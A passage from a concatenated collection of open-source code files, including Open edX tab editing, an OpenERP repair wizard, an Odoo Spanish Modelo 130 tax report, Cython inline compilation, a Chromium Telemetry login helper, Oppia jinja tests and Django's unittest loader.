if 'is_hidden' in request.json:
# set the is_hidden attribute on the requested tab
tab.is_hidden = request.json['is_hidden']
modulestore().update_item(course_item, request.user.id)
else:
raise NotImplementedError('Unsupported request to edit tab: {0}'.format(request.json))
return JsonResponse()
def get_tab_by_tab_id_locator(tab_list, tab_id_locator):
"""
Look for a tab with the specified tab_id or locator. Returns the first matching tab.
"""
if 'tab_id' in tab_id_locator:
tab = CourseTabList.get_tab_by_id(tab_list, tab_id_locator['tab_id'])
elif 'tab_locator' in tab_id_locator:
tab = get_tab_by_locator(tab_list, tab_id_locator['tab_locator'])
return tab
def get_tab_by_locator(tab_list, usage_key_string):
"""
Look for a tab with the specified locator. Returns the first matching tab.
"""
tab_location = UsageKey.from_string(usage_key_string)
item = modulestore().get_item(tab_location)
static_tab = StaticTab(
name=item.display_name,
url_slug=item.location.name,
)
return CourseTabList.get_tab_by_id(tab_list, static_tab.tab_id)
# "primitive" tab edit functions driven by the command line.
# These should be replaced/deleted by a more capable GUI someday.
# Note that the command line UI identifies the tabs with 1-based
# indexing, but this implementation code is standard 0-based.
def validate_args(num, tab_type):
"Throws for the disallowed cases."
if num <= 1:
raise ValueError('Tabs 1 and 2 cannot be edited')
if tab_type == 'static_tab':
raise ValueError('Tabs of type static_tab cannot be edited here (use Studio)')
def primitive_delete(course, num):
"Deletes the given tab number (0 based)."
tabs = course.tabs
validate_args(num, tabs[num].get('type', ''))
del tabs[num]
# Note for future implementations: if you delete a static_tab, then Chris Dodge
# points out that there's other stuff to delete beyond this element.
# This code happens to not delete static_tab so it doesn't come up.
modulestore().update_item(course, ModuleStoreEnum.UserID.primitive_command)
def primitive_insert(course, num, tab_type, name):
"Inserts a new tab at the given number (0 based)."
validate_args(num, tab_type)
new_tab = CourseTab.from_json({u'type': unicode(tab_type), u'name': unicode(name)})
tabs = course.tabs
tabs.insert(num, new_tab)
modulestore().update_item(course, ModuleStoreEnum.UserID.primitive_command)
| agpl-3.0 |
credativUK/OCB | addons/mrp_repair/wizard/cancel_repair.py | 52 | 3699 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv,fields
from openerp.tools.translate import _
class repair_cancel(osv.osv_memory):
_name = 'mrp.repair.cancel'
_description = 'Cancel Repair'
def cancel_repair(self, cr, uid, ids, context=None):
""" Cancels the repair
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param ids: List of IDs selected
@param context: A standard dictionary
@return:
"""
if context is None:
context = {}
record_id = context and context.get('active_id', False) or False
assert record_id, _('Active ID not Found')
repair_order_obj = self.pool.get('mrp.repair')
repair_line_obj = self.pool.get('mrp.repair.line')
repair_order = repair_order_obj.browse(cr, uid, record_id, context=context)
if repair_order.invoiced or repair_order.invoice_method == 'none':
repair_order_obj.action_cancel(cr, uid, [record_id], context=context)
else:
raise osv.except_osv(_('Warning!'),_('Repair order is not invoiced.'))
return {'type': 'ir.actions.act_window_close'}
def fields_view_get(self, cr, uid, view_id=None, view_type='form', context=None, toolbar=False, submenu=False):
""" Changes the view dynamically
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param context: A standard dictionary
@return: New arch of view.
"""
if context is None:
context = {}
res = super(repair_cancel, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar,submenu=False)
record_id = context and context.get('active_id', False) or False
active_model = context.get('active_model')
if not record_id or (active_model and active_model != 'mrp.repair'):
return res
repair_order = self.pool.get('mrp.repair').browse(cr, uid, record_id, context=context)
if not repair_order.invoiced:
res['arch'] = """
<form string="Cancel Repair" version="7.0">
<header>
<button name="cancel_repair" string="_Yes" type="object" class="oe_highlight"/>
or
<button string="Cancel" class="oe_link" special="cancel"/>
</header>
<label string="Do you want to continue?"/>
</form>
"""
return res
repair_cancel()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
cubells/l10n-spain | l10n_es_aeat_mod130/models/mod130.py | 1 | 10541 | # Copyright 2014-2019 Tecnativa - Pedro M. Baeza
from odoo import _, api, fields, exceptions, models
def trunc(f, n):
slen = len('%.*f' % (n, f))
return float(str(f)[:slen])
class L10nEsAeatMod130Report(models.Model):
_description = "AEAT 130 report"
_inherit = "l10n.es.aeat.report"
_name = "l10n.es.aeat.mod130.report"
_aeat_number = '130'
company_partner_id = fields.Many2one('res.partner',
string='Company partner',
relation='company_id.partner_id',
store=True)
currency_id = fields.Many2one('res.currency', string='Currency',
relation='company_id.currency_id',
store=True)
activity_type = fields.Selection(
[('primary', 'Actividad agrícola, ganadera, forestal o pesquera'),
('other', 'Actividad distinta a las anteriores')],
string='Tipo de actividad', states={'draft': [('readonly', False)]},
readonly=True, required=True, default='other')
has_deduccion_80 = fields.Boolean(
string="¿Deducción por art. 80 bis?",
states={'draft': [('readonly', False)]}, readonly=True,
help="Permite indicar si puede beneficiarse de la deducción por "
"obtención de rendimientos de actividades económicas a efectos del "
"pago fraccionado por cumplir el siguiente requisito:\n Que, en el "
"primer trimestre del ejercicio o en el primer trimestre de inicio de "
"actividades, la suma del resultado de elevar al año el importe de la "
"casilla 03 y/o, en su caso, el resultado de elevar al año el 25 por "
"100 de la casilla 08, sea igual o inferior a 12.000 euros. En los "
"supuestos de inicio de la actividad a lo largo del ejercicio en la "
"elevación al año se tendrán en consideración los días que resten "
"hasta el final del año.", default=False)
has_prestamo = fields.Boolean(
string="¿Préstamo para vivienda habitual?",
states={'draft': [('readonly', False)]}, readonly=True,
help="Permite indicar si destina cantidades al pago de préstamos "
"para la adquisición o rehabilitación de la vivienda habitual. Si "
"marca la casilla, se podrá realiza un 2% de deducción sobre el "
"importe de la casilla [03], con un máximo de 660,14 € por trimestre, "
"o del 2% de la casilla [08], con un máximo de 660,14 euros anuales. "
"\nDebe consultar las excepciones para las que no se computaría "
"la deducción a pesar del préstamo.", default=False)
comments = fields.Char(
string="Observaciones", size=350, readonly=True,
help="Observaciones que se adjuntarán con el modelo",
states={'draft': [('readonly', False)]})
casilla_01 = fields.Monetary(
string="Casilla [01] - Ingresos",
readonly=True,
)
real_expenses = fields.Monetary(
string="Gastos reales",
help="Gastos en el periodo sin contar con el 5% adicional de difícil "
"justificación.",
)
non_justified_expenses = fields.Monetary(
string="Gastos de difícil justificación",
help="Calculado como el 5% del rendimiento del periodo (ingresos - "
"gastos reales).",
)
casilla_02 = fields.Monetary(string="Casilla [02] - Gastos", readonly=True)
casilla_03 = fields.Monetary(
string="Casilla [03] - Rendimiento",
readonly=True,
)
casilla_04 = fields.Monetary(string="Casilla [04] - IRPF", readonly=True)
casilla_05 = fields.Monetary(string="Casilla [05]")
casilla_06 = fields.Monetary(string="Casilla [06]", readonly=True)
casilla_07 = fields.Monetary(string="Casilla [07]", readonly=True)
casilla_08 = fields.Monetary(
string="Casilla [08] - Ingresos primario",
readonly=True,
)
casilla_09 = fields.Monetary(
string="Casilla [09] - IRPF primario",
readonly=True,
)
casilla_10 = fields.Monetary(string="Casilla [10]", readonly=True)
casilla_11 = fields.Monetary(string="Casilla [11]", readonly=True)
casilla_12 = fields.Monetary(string="Casilla [12]", readonly=True)
casilla_13 = fields.Monetary(
string="Casilla [13] - Deducción art. 80 bis",
readonly=True,
)
casilla_14 = fields.Monetary(string="Casilla [14]", readonly=True)
casilla_15 = fields.Monetary(string="Casilla [15]", readonly=True)
casilla_16 = fields.Monetary(
string="Casilla [16] - Deducción por pago de hipoteca",
readonly=True,
)
casilla_17 = fields.Monetary(string="Casilla [17]", readonly=True)
casilla_18 = fields.Monetary(string="Casilla [18]", readonly=True)
result = fields.Monetary(
string="Resultado",
compute="_compute_result",
store=True,
)
tipo_declaracion = fields.Selection(
selection=[
('I', 'A ingresar'),
('N', 'Negativa'),
('B', 'A deducir')
],
string='Tipo declaración',
compute="_compute_tipo_declaracion",
store=True,
)
@api.depends('casilla_18', 'casilla_17')
def _compute_result(self):
for report in self:
report.result = report.casilla_17 - report.casilla_18
@api.depends('result')
def _compute_tipo_declaracion(self):
for report in self:
if report.result < 0:
report.tipo_declaracion = (
"B" if report.period_type != '4T' else "N"
)
else:
report.tipo_declaracion = "I"
@api.multi
def _calc_ingresos_gastos(self):
self.ensure_one()
aml_obj = self.env['account.move.line']
date_start = '%s-01-01' % self.year
extra_domain = [
('company_id', '=', self.company_id.id),
('date', '>=', date_start),
('date', '<=', self.date_end),
]
groups = aml_obj.read_group([
('account_id.code', '=like', '7%'),
] + extra_domain, ['balance'], [])
incomes = groups[0]['balance'] and -groups[0]['balance'] or 0.0
groups = aml_obj.read_group([
('account_id.code', '=like', '6%'),
] + extra_domain, ['balance'], [])
expenses = groups[0]['balance'] or 0.0
return (incomes, expenses)
@api.multi
def _calc_prev_trimesters_data(self):
self.ensure_one()
amount = 0
prev_reports = self._get_previous_fiscalyear_reports(self.date_start)
for prev in prev_reports:
if prev.casilla_07 > 0:
amount += prev.casilla_07 - prev.casilla_16
return amount
@api.multi
def calculate(self):
for report in self:
if report.activity_type == 'primary':
raise exceptions.Warning(_('Este tipo de actividad no '
'está aún soportado por el módulo.'))
if report.has_deduccion_80:
raise exceptions.Warning(_(
'No se pueden calcular por el '
'momento declaraciones que contengan deducciones por el '
'artículo 80 bis.'))
vals = {}
if report.activity_type == 'other':
ingresos, gastos = report._calc_ingresos_gastos()
vals['casilla_01'] = ingresos
vals['real_expenses'] = gastos
rendimiento_bruto = (ingresos - gastos)
if rendimiento_bruto > 0:
vals['non_justified_expenses'] = round(
rendimiento_bruto * 0.05, 2
)
else:
vals['non_justified_expenses'] = 0.0
vals['casilla_02'] = gastos + vals['non_justified_expenses']
# Rendimiento
vals['casilla_03'] = ingresos - vals['casilla_02']
# IRPF - Truncar resultado, ya que es lo que hace la AEAT
if vals['casilla_03'] < 0:
vals['casilla_04'] = 0.0
else:
vals['casilla_04'] = trunc(0.20 * vals['casilla_03'], 2)
# Pago fraccionado previo del trimestre
vals['casilla_05'] = report._calc_prev_trimesters_data()
vals['casilla_07'] = (vals['casilla_04'] - vals['casilla_05'] -
report.casilla_06)
vals['casilla_12'] = vals['casilla_07']
if vals['casilla_12'] < 0:
vals['casilla_12'] = 0.0
else:
# TODO: Modelo 130 para actividades primarias
vals['casilla_12'] = vals['casilla_11']
# TODO: Deducción artículo 80 bis
vals['casilla_13'] = 0.0
vals['casilla_14'] = vals['casilla_12'] - vals['casilla_13']
# TODO: Poner los resultados negativos de anteriores trimestres
vals['casilla_15'] = 0.0
# Deducción por hipóteca
if report.has_prestamo and vals['casilla_14'] > 0:
# Truncar resultado, ya que es lo que hace la AEAT
deduccion = trunc(0.02 * vals['casilla_03'], 2)
if report.activity_type == 'other':
if deduccion > 660.14:
deduccion = 660.14
else:
raise exceptions.Warning(_('No implementado'))
dif = vals['casilla_14'] - vals['casilla_15']
if deduccion > dif:
deduccion = dif
vals['casilla_16'] = deduccion
else:
vals['casilla_16'] = 0.0
vals['casilla_17'] = (vals['casilla_14'] - vals['casilla_15'] -
vals['casilla_16'])
report.write(vals)
return True
@api.multi
def button_confirm(self):
"""Check its records"""
msg = ""
for report in self:
if report.type == 'C' and not report.casilla_18:
msg = _(
'Debe introducir una cantidad en la casilla 18 como '
'ha marcado la casilla de declaración complementaria.'
)
if msg:
raise exceptions.ValidationError(msg)
return super(L10nEsAeatMod130Report, self).button_confirm()
| agpl-3.0 |
collinjackson/mojo | third_party/cython/src/Cython/Build/Inline.py | 89 | 10878 | import sys, os, re, inspect
import imp
try:
import hashlib
except ImportError:
import md5 as hashlib
from distutils.core import Distribution, Extension
from distutils.command.build_ext import build_ext
import Cython
from Cython.Compiler.Main import Context, CompilationOptions, default_options
from Cython.Compiler.ParseTreeTransforms import CythonTransform, SkipDeclarations, AnalyseDeclarationsTransform
from Cython.Compiler.TreeFragment import parse_from_strings
from Cython.Build.Dependencies import strip_string_literals, cythonize, cached_function
from Cython.Compiler import Pipeline
from Cython.Utils import get_cython_cache_dir
import cython as cython_module
# A utility function to convert user-supplied ASCII strings to unicode.
if sys.version_info[0] < 3:
def to_unicode(s):
if not isinstance(s, unicode):
return s.decode('ascii')
else:
return s
else:
to_unicode = lambda x: x
class AllSymbols(CythonTransform, SkipDeclarations):
def __init__(self):
CythonTransform.__init__(self, None)
self.names = set()
def visit_NameNode(self, node):
self.names.add(node.name)
@cached_function
def unbound_symbols(code, context=None):
code = to_unicode(code)
if context is None:
context = Context([], default_options)
from Cython.Compiler.ParseTreeTransforms import AnalyseDeclarationsTransform
tree = parse_from_strings('(tree fragment)', code)
for phase in Pipeline.create_pipeline(context, 'pyx'):
if phase is None:
continue
tree = phase(tree)
if isinstance(phase, AnalyseDeclarationsTransform):
break
symbol_collector = AllSymbols()
symbol_collector(tree)
unbound = []
try:
import builtins
except ImportError:
import __builtin__ as builtins
for name in symbol_collector.names:
if not tree.scope.lookup(name) and not hasattr(builtins, name):
unbound.append(name)
return unbound
def unsafe_type(arg, context=None):
py_type = type(arg)
if py_type is int:
return 'long'
else:
return safe_type(arg, context)
def safe_type(arg, context=None):
py_type = type(arg)
if py_type in [list, tuple, dict, str]:
return py_type.__name__
elif py_type is complex:
return 'double complex'
elif py_type is float:
return 'double'
elif py_type is bool:
return 'bint'
elif 'numpy' in sys.modules and isinstance(arg, sys.modules['numpy'].ndarray):
return 'numpy.ndarray[numpy.%s_t, ndim=%s]' % (arg.dtype.name, arg.ndim)
else:
for base_type in py_type.mro():
if base_type.__module__ in ('__builtin__', 'builtins'):
return 'object'
module = context.find_module(base_type.__module__, need_pxd=False)
if module:
entry = module.lookup(base_type.__name__)
if entry.is_type:
return '%s.%s' % (base_type.__module__, base_type.__name__)
return 'object'
def _get_build_extension():
dist = Distribution()
# Ensure the build respects distutils configuration by parsing
# the configuration files
config_files = dist.find_config_files()
dist.parse_config_files(config_files)
build_extension = build_ext(dist)
build_extension.finalize_options()
return build_extension
@cached_function
def _create_context(cython_include_dirs):
return Context(list(cython_include_dirs), default_options)
def cython_inline(code,
get_type=unsafe_type,
lib_dir=os.path.join(get_cython_cache_dir(), 'inline'),
cython_include_dirs=['.'],
force=False,
quiet=False,
locals=None,
globals=None,
**kwds):
if get_type is None:
get_type = lambda x: 'object'
code = to_unicode(code)
orig_code = code
code, literals = strip_string_literals(code)
code = strip_common_indent(code)
ctx = _create_context(tuple(cython_include_dirs))
if locals is None:
locals = inspect.currentframe().f_back.f_back.f_locals
if globals is None:
globals = inspect.currentframe().f_back.f_back.f_globals
try:
for symbol in unbound_symbols(code):
if symbol in kwds:
continue
elif symbol in locals:
kwds[symbol] = locals[symbol]
elif symbol in globals:
kwds[symbol] = globals[symbol]
else:
print("Couldn't find ", symbol)
except AssertionError:
if not quiet:
# Parsing from strings not fully supported (e.g. cimports).
print("Could not parse code as a string (to extract unbound symbols).")
cimports = []
for name, arg in kwds.items():
if arg is cython_module:
cimports.append('\ncimport cython as %s' % name)
del kwds[name]
arg_names = kwds.keys()
arg_names.sort()
arg_sigs = tuple([(get_type(kwds[arg], ctx), arg) for arg in arg_names])
key = orig_code, arg_sigs, sys.version_info, sys.executable, Cython.__version__
module_name = "_cython_inline_" + hashlib.md5(str(key).encode('utf-8')).hexdigest()
if module_name in sys.modules:
module = sys.modules[module_name]
else:
build_extension = None
if cython_inline.so_ext is None:
# Figure out and cache current extension suffix
build_extension = _get_build_extension()
cython_inline.so_ext = build_extension.get_ext_filename('')
module_path = os.path.join(lib_dir, module_name + cython_inline.so_ext)
if not os.path.exists(lib_dir):
os.makedirs(lib_dir)
if force or not os.path.isfile(module_path):
cflags = []
c_include_dirs = []
qualified = re.compile(r'([.\w]+)[.]')
for type, _ in arg_sigs:
m = qualified.match(type)
if m:
cimports.append('\ncimport %s' % m.groups()[0])
# one special case
if m.groups()[0] == 'numpy':
import numpy
c_include_dirs.append(numpy.get_include())
# cflags.append('-Wno-unused')
module_body, func_body = extract_func_code(code)
params = ', '.join(['%s %s' % a for a in arg_sigs])
module_code = """
%(module_body)s
%(cimports)s
def __invoke(%(params)s):
%(func_body)s
""" % {'cimports': '\n'.join(cimports), 'module_body': module_body, 'params': params, 'func_body': func_body }
for key, value in literals.items():
module_code = module_code.replace(key, value)
pyx_file = os.path.join(lib_dir, module_name + '.pyx')
fh = open(pyx_file, 'w')
try:
fh.write(module_code)
finally:
fh.close()
extension = Extension(
name = module_name,
sources = [pyx_file],
include_dirs = c_include_dirs,
extra_compile_args = cflags)
if build_extension is None:
build_extension = _get_build_extension()
build_extension.extensions = cythonize([extension], include_path=cython_include_dirs, quiet=quiet)
build_extension.build_temp = os.path.dirname(pyx_file)
build_extension.build_lib = lib_dir
build_extension.run()
module = imp.load_dynamic(module_name, module_path)
arg_list = [kwds[arg] for arg in arg_names]
return module.__invoke(*arg_list)
# Cached suffix used by cython_inline above. None should get
# overridden with actual value upon the first cython_inline invocation
cython_inline.so_ext = None
non_space = re.compile('[^ ]')
def strip_common_indent(code):
min_indent = None
lines = code.split('\n')
for line in lines:
match = non_space.search(line)
if not match:
continue # blank
indent = match.start()
if line[indent] == '#':
continue # comment
elif min_indent is None or min_indent > indent:
min_indent = indent
for ix, line in enumerate(lines):
match = non_space.search(line)
if not match or line[indent] == '#':
continue
else:
lines[ix] = line[min_indent:]
return '\n'.join(lines)
module_statement = re.compile(r'^((cdef +(extern|class))|cimport|(from .+ cimport)|(from .+ import +[*]))')
def extract_func_code(code):
module = []
function = []
current = function
code = code.replace('\t', ' ')
lines = code.split('\n')
for line in lines:
if not line.startswith(' '):
if module_statement.match(line):
current = module
else:
current = function
current.append(line)
return '\n'.join(module), ' ' + '\n '.join(function)
try:
from inspect import getcallargs
except ImportError:
def getcallargs(func, *arg_values, **kwd_values):
all = {}
args, varargs, kwds, defaults = inspect.getargspec(func)
if varargs is not None:
all[varargs] = arg_values[len(args):]
for name, value in zip(args, arg_values):
all[name] = value
for name, value in kwd_values.items():
if name in args:
if name in all:
raise TypeError("Duplicate argument %s" % name)
all[name] = kwd_values.pop(name)
if kwds is not None:
all[kwds] = kwd_values
elif kwd_values:
raise TypeError("Unexpected keyword arguments: %s" % kwd_values.keys())
if defaults is None:
defaults = ()
first_default = len(args) - len(defaults)
for ix, name in enumerate(args):
if name not in all:
if ix >= first_default:
all[name] = defaults[ix - first_default]
else:
raise TypeError("Missing argument: %s" % name)
return all
def get_body(source):
ix = source.index(':')
if source[:5] == 'lambda':
return "return %s" % source[ix+1:]
else:
return source[ix+1:]
# Lots to be done here... It would be especially cool if compiled functions
# could invoke each other quickly.
class RuntimeCompiledFunction(object):
def __init__(self, f):
self._f = f
self._body = get_body(inspect.getsource(f))
def __call__(self, *args, **kwds):
all = getcallargs(self._f, *args, **kwds)
return cython_inline(self._body, locals=self._f.func_globals, globals=self._f.func_globals, **all)
| bsd-3-clause |
yury-s/v8-inspector | Source/chrome/tools/telemetry/telemetry/core/backends/form_based_credentials_backend.py | 24 | 3604 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
from telemetry.core import exceptions
class FormBasedCredentialsBackend(object):
def __init__(self):
self._logged_in = False
def IsAlreadyLoggedIn(self, tab):
return tab.EvaluateJavaScript(self.logged_in_javascript)
@property
def credentials_type(self):
raise NotImplementedError()
@property
def url(self):
raise NotImplementedError()
@property
def login_form_id(self):
raise NotImplementedError()
@property
def login_button_javascript(self):
"""Some sites have custom JS to log in."""
return None
@property
def login_input_id(self):
raise NotImplementedError()
@property
def password_input_id(self):
raise NotImplementedError()
@property
def logged_in_javascript(self):
"""Evaluates to true iff already logged in."""
raise NotImplementedError()
def IsLoggedIn(self):
return self._logged_in
def _ResetLoggedInState(self):
"""Makes the backend think we're not logged in even though we are.
Should only be used in unit tests to simulate --dont-override-profile.
"""
self._logged_in = False
def _WaitForLoginState(self, action_runner):
"""Waits until it can detect either the login form, or already logged in."""
condition = '(document.querySelector("#%s") !== null) || (%s)' % (
self.login_form_id, self.logged_in_javascript)
action_runner.WaitForJavaScriptCondition(condition, 60)
def _SubmitLoginFormAndWait(self, action_runner, tab, username, password):
"""Submits the login form and waits for the navigation."""
tab.WaitForDocumentReadyStateToBeInteractiveOrBetter()
email_id = 'document.querySelector("#%s #%s").value = "%s"; ' % (
self.login_form_id, self.login_input_id, username)
password = 'document.querySelector("#%s #%s").value = "%s"; ' % (
self.login_form_id, self.password_input_id, password)
tab.ExecuteJavaScript(email_id)
tab.ExecuteJavaScript(password)
if self.login_button_javascript:
tab.ExecuteJavaScript(self.login_button_javascript)
else:
tab.ExecuteJavaScript(
'document.getElementById("%s").submit();' % self.login_form_id)
# Wait for the form element to disappear as confirmation of the navigation.
action_runner.WaitForNavigate()
def LoginNeeded(self, tab, action_runner, config):
"""Logs in to a test account.
Raises:
RuntimeError: if could not get credential information.
"""
if self._logged_in:
return True
if 'username' not in config or 'password' not in config:
message = ('Credentials for "%s" must include username and password.' %
self.credentials_type)
raise RuntimeError(message)
logging.debug('Logging into %s account...' % self.credentials_type)
if 'url' in config:
url = config['url']
else:
url = self.url
try:
logging.info('Loading %s...', url)
tab.Navigate(url)
self._WaitForLoginState(action_runner)
if self.IsAlreadyLoggedIn(tab):
self._logged_in = True
return True
self._SubmitLoginFormAndWait(
action_runner, tab, config['username'], config['password'])
self._logged_in = True
return True
except exceptions.TimeoutException:
logging.warning('Timed out while loading: %s', url)
return False
def LoginNoLongerNeeded(self, tab): # pylint: disable=W0613
assert self._logged_in
| bsd-3-clause |
amitdeutsch/oppia | jinja_utils_test.py | 9 | 4194 | # coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=relative-import
from core.tests import test_utils
import jinja_utils
class JinjaUtilsUnitTests(test_utils.GenericTestBase):
def test_js_string_filter(self):
"""Test js_string filter."""
expected_values = [
('a', '\\"a\\"'),
(2, '2'),
(5.5, '5.5'),
("'", '\\"\\\'\\"'),
(u'¡Hola!', '\\"\\\\u00a1Hola!\\"'),
(['a', '¡Hola!', 2], '[\\"a\\", \\"\\\\u00a1Hola!\\", 2]'),
({'a': 4, '¡Hola!': 2}, '{\\"a\\": 4, \\"\\\\u00a1Hola!\\": 2}'),
('', '\\"\\"'),
(None, 'null'),
(['a', {'b': 'c', 'd': ['e', None]}],
'[\\"a\\", {\\"b\\": \\"c\\", \\"d\\": [\\"e\\", null]}]')
]
for tup in expected_values:
self.assertEqual(jinja_utils.JINJA_FILTERS['js_string'](
tup[0]), tup[1])
def test_parse_string(self):
parsed_str = jinja_utils.parse_string('{{test}}', {'test': 'hi'})
self.assertEqual(parsed_str, 'hi')
# Some parameters are missing.
parsed_str = jinja_utils.parse_string(
'{{test}} and {{test2}}', {'test2': 'hi'})
self.assertEqual(parsed_str, ' and hi')
# All parameters are missing.
parsed_str = jinja_utils.parse_string('{{test}} and {{test2}}', {})
self.assertEqual(parsed_str, ' and ')
# The string has no parameters.
parsed_str = jinja_utils.parse_string('no params', {'param': 'hi'})
self.assertEqual(parsed_str, 'no params')
# Integer parameters are used.
parsed_str = jinja_utils.parse_string('int {{i}}', {'i': 2})
self.assertEqual(parsed_str, 'int 2')
def test_evaluate_object(self):
parsed_object = jinja_utils.evaluate_object('abc', {})
self.assertEqual(parsed_object, 'abc')
parsed_object = jinja_utils.evaluate_object('{{ab}}', {'ab': 'c'})
self.assertEqual(parsed_object, 'c')
parsed_object = jinja_utils.evaluate_object('abc{{ab}}', {'ab': 'c'})
self.assertEqual(parsed_object, 'abcc')
parsed_object = jinja_utils.evaluate_object(
['a', '{{a}}', 'a{{a}}'], {'a': 'b'})
self.assertEqual(parsed_object, ['a', 'b', 'ab'])
parsed_object = jinja_utils.evaluate_object({}, {})
self.assertEqual(parsed_object, {})
parsed_object = jinja_utils.evaluate_object({}, {'a': 'b'})
self.assertEqual(parsed_object, {})
parsed_object = jinja_utils.evaluate_object({'a': 'b'}, {})
self.assertEqual(parsed_object, {'a': 'b'})
parsed_object = jinja_utils.evaluate_object(
{'a': 'a{{b}}'}, {'b': 'c'})
self.assertEqual(parsed_object, {'a': 'ac'})
parsed_object = jinja_utils.evaluate_object({'a': '{{b}}'}, {'b': 3})
self.assertEqual(parsed_object, {'a': '3'})
parsed_object = jinja_utils.evaluate_object({'a': '{{b}}'}, {'b': 'c'})
self.assertEqual(parsed_object, {'a': 'c'})
# Failure cases should be handled gracefully.
parsed_object = jinja_utils.evaluate_object('{{c}}', {})
self.assertEqual(parsed_object, '')
parsed_object = jinja_utils.evaluate_object('{{c}}', {'a': 'b'})
self.assertEqual(parsed_object, '')
# Test that the original dictionary is unchanged.
orig_dict = {'a': '{{b}}'}
parsed_dict = jinja_utils.evaluate_object(orig_dict, {'b': 'c'})
self.assertEqual(orig_dict, {'a': '{{b}}'})
self.assertEqual(parsed_dict, {'a': 'c'})
| apache-2.0 |
cosmiclattes/TPBviz | torrent/lib/python2.7/site-packages/django/utils/unittest/loader.py | 110 | 13445 | """Loading unittests."""
import os
import re
import sys
import traceback
import types
import unittest
from fnmatch import fnmatch
from django.utils.unittest import case, suite
try:
from os.path import relpath
except ImportError:
from django.utils.unittest.compatibility import relpath
__unittest = True
def _CmpToKey(mycmp):
'Convert a cmp= function into a key= function'
class K(object):
def __init__(self, obj):
self.obj = obj
def __lt__(self, other):
return mycmp(self.obj, other.obj) == -1
return K
# what about .pyc or .pyo (etc)
# we would need to avoid loading the same tests multiple times
# from '.py', '.pyc' *and* '.pyo'
VALID_MODULE_NAME = re.compile(r'[_a-z]\w*\.py$', re.IGNORECASE)
def _make_failed_import_test(name, suiteClass):
message = 'Failed to import test module: %s' % name
if hasattr(traceback, 'format_exc'):
# Python 2.3 compatibility
# format_exc returns two frames of discover.py as well
message += '\n%s' % traceback.format_exc()
return _make_failed_test('ModuleImportFailure', name, ImportError(message),
suiteClass)
def _make_failed_load_tests(name, exception, suiteClass):
return _make_failed_test('LoadTestsFailure', name, exception, suiteClass)
def _make_failed_test(classname, methodname, exception, suiteClass):
def testFailure(self):
raise exception
attrs = {methodname: testFailure}
TestClass = type(classname, (case.TestCase,), attrs)
return suiteClass((TestClass(methodname),))
class TestLoader(unittest.TestLoader):
"""
This class is responsible for loading tests according to various criteria
and returning them wrapped in a TestSuite
"""
testMethodPrefix = 'test'
sortTestMethodsUsing = cmp
suiteClass = suite.TestSuite
_top_level_dir = None
def loadTestsFromTestCase(self, testCaseClass):
"""Return a suite of all tests cases contained in testCaseClass"""
if issubclass(testCaseClass, suite.TestSuite):
raise TypeError("Test cases should not be derived from TestSuite."
" Maybe you meant to derive from TestCase?")
testCaseNames = self.getTestCaseNames(testCaseClass)
if not testCaseNames and hasattr(testCaseClass, 'runTest'):
testCaseNames = ['runTest']
loaded_suite = self.suiteClass(map(testCaseClass, testCaseNames))
return loaded_suite
def loadTestsFromModule(self, module, use_load_tests=True):
"""Return a suite of all tests cases contained in the given module"""
tests = []
for name in dir(module):
obj = getattr(module, name)
if isinstance(obj, type) and issubclass(obj, unittest.TestCase):
tests.append(self.loadTestsFromTestCase(obj))
load_tests = getattr(module, 'load_tests', None)
tests = self.suiteClass(tests)
if use_load_tests and load_tests is not None:
try:
return load_tests(self, tests, None)
except Exception as e:
return _make_failed_load_tests(module.__name__, e,
self.suiteClass)
return tests
def loadTestsFromName(self, name, module=None):
"""Return a suite of all tests cases given a string specifier.
The name may resolve either to a module, a test case class, a
test method within a test case class, or a callable object which
returns a TestCase or TestSuite instance.
The method optionally resolves the names relative to a given module.
"""
parts = name.split('.')
if module is None:
parts_copy = parts[:]
while parts_copy:
try:
module = __import__('.'.join(parts_copy))
break
except ImportError:
del parts_copy[-1]
if not parts_copy:
raise
parts = parts[1:]
obj = module
for part in parts:
parent, obj = obj, getattr(obj, part)
if isinstance(obj, types.ModuleType):
return self.loadTestsFromModule(obj)
elif isinstance(obj, type) and issubclass(obj, unittest.TestCase):
return self.loadTestsFromTestCase(obj)
elif (isinstance(obj, types.UnboundMethodType) and
isinstance(parent, type) and
issubclass(parent, unittest.TestCase)):
return self.suiteClass([parent(obj.__name__)])
elif isinstance(obj, unittest.TestSuite):
return obj
elif hasattr(obj, '__call__'):
test = obj()
if isinstance(test, unittest.TestSuite):
return test
elif isinstance(test, unittest.TestCase):
return self.suiteClass([test])
else:
raise TypeError("calling %s returned %s, not a test" %
(obj, test))
else:
raise TypeError("don't know how to make test from: %s" % obj)
def loadTestsFromNames(self, names, module=None):
"""Return a suite of all tests cases found using the given sequence
of string specifiers. See 'loadTestsFromName()'.
"""
suites = [self.loadTestsFromName(name, module) for name in names]
return self.suiteClass(suites)
def getTestCaseNames(self, testCaseClass):
"""Return a sorted sequence of method names found within testCaseClass
"""
def isTestMethod(attrname, testCaseClass=testCaseClass,
prefix=self.testMethodPrefix):
return attrname.startswith(prefix) and \
